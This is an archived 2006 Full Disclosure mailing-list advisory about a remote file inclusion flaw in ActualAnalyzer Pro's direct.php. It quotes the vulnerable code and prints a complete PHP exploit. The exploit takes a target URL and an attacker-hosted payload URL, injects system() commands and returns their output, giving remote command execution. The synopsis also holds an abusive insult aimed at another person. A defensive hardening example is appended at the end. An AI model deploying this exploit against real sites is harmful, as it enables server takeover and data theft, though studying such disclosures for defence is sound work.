Full Disclosure mailing list archives
[XPA] ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability
From: wr0ck <wr0ck.lists () gmail com>
Date: Mon, 08 May 2006 11:26:09 -0400
=======================================================================================
XOR Crew :: Security Advisory 4/10/2006
=======================================================================================
ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability
=======================================================================================
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN
=======================================================================================

:: Summary

Vendor       : ActualScripts
Vendor Site  : http://www.actualscripts.com/
Product(s)   : ActualAnalyzer Pro v6.88
Version(s)   : All
Severity     : Medium/High
Impact       : Remote Command Execution
Release Date : 4/10/2006
Credits      : ReZEN (rezen (a) xorcrew (.) net)

=======================================================================================

I. Description

Pro Edition — the professional solution for medium and large business web sites. The ability to collect highly detailed statistics about each separate page of a web site will help you effectively manage the overall Internet strategy and direction of the company, and successfully optimize and develop it.

=======================================================================================

II. Synopsis

FUCK YOU 'ASHTETICO' 0hday releasing wh0re.

There is a remote file inclusion vulnerability that allows for remote command execution in the /direct.php file. The bug is on lines 5-8:

    if(!isset($rf)) $rf='./';
    require $rf.'common/error.php';
    require $rf.'common/global.php';
    require $rf.'common/config.php';
    require $rf.'common/dbaccess.php';

The $rf variable is not set prior to being used in the require() statements, so with register_globals enabled a client can pre-set it through a request parameter (direct.php?rf=http://...) and have every require fetch and execute a remote file. The vendor and support team have been contacted.

=======================================================================================

III. Exploit code

-----BEGIN-----
<?php
/*
ActualAnalyzer Remote File Inclusion Exploit
c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K
url: http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/path to actualanalyzer/direct.php?rf=
hurl: http://www.pwn3d.com/evil.txt?
*/

$cmd  = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form = "<form method=\"post\" action=\"".$PHP_SELF."\">"
       ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>"
       ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>"
       ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>"
       ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
       ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit'])) {
    echo $form;
} else {
    $file = fopen("test.txt", "w+");
    fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\"); system(\"echo ++END++\"); ?>");
    fclose($file);
    $file = fopen($turl.$hurl, "r");
    if (!$file) {
        echo "<p>Unable to get output.\n";
        exit;
    }
    echo $form;
    while (!feof($file)) {
        $line .= fgets($file, 1024)."<br>";
    }
    $tpos1 = strpos($line, "++BEGIN++");
    $tpos2 = strpos($line, "++END++");
    $tpos1 = $tpos1 + strlen("++BEGIN++");
    $tpos2 = $tpos2 - $tpos1;
    $output = substr($line, $tpos1, $tpos2);
    echo $output;
}
?>
------END------

=======================================================================================

IV. Greets :> All of xor, Infinity, stokhli, ajax, gml, D2K

=======================================================================================
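As an added example (not the vendor's code or anything from the advisory), here is the include preamble of direct.php written so that the include base cannot come from request data, with a fail-closed check on the interpreter settings that make remote inclusion possible. Paths and php.ini option names are assumptions about a typical install.

```php
<?php
// Added example, not the vendor's code: direct.php's include preamble
// written so that the include base cannot come from request data.
//
// Root cause recap: with register_globals on, "if(!isset($rf))" lets a
// client pre-set $rf via ?rf=http://host/ and every require below then
// fetches and executes remote PHP. Two independent layers address that:
//   1. the base path is derived from the script's own location, never
//      from $_GET/$_POST/$_COOKIE, and each target is verified to
//      resolve inside that directory;
//   2. the script refuses to run while the interpreter settings that
//      make remote inclusion possible are enabled, so a similar bug
//      elsewhere in the application cannot reach the network either.
// Settings and paths below are assumptions about a typical install.

// Layer 2: fail closed on dangerous php.ini values. ini_get() returns a
// falsy string ("" or "0") when an option is off; allow_url_include
// only exists from PHP 5.2, on older builds ini_get() returns false.
foreach (array('register_globals', 'allow_url_include') as $opt) {
    if (ini_get($opt)) {
        header('HTTP/1.1 500 Internal Server Error');
        error_log("direct.php: refusing to run, $opt is enabled");
        exit;
    }
}

// Layer 1: fixed base directory, resolved once, never taken from input.
$base = realpath(dirname(__FILE__)) . DIRECTORY_SEPARATOR;

$required = array(
    'common/error.php',
    'common/global.php',
    'common/config.php',
    'common/dbaccess.php',
);

foreach ($required as $rel) {
    // realpath() resolves symlinks and '..', so the prefix test is a
    // genuine containment check and stays correct even if this list is
    // later extended with a computed name.
    $abs = realpath($base . $rel);
    if ($abs === false || strncmp($abs, $base, strlen($base)) !== 0) {
        error_log("direct.php: refusing to include $rel");
        exit;
    }
    require $abs;
}
```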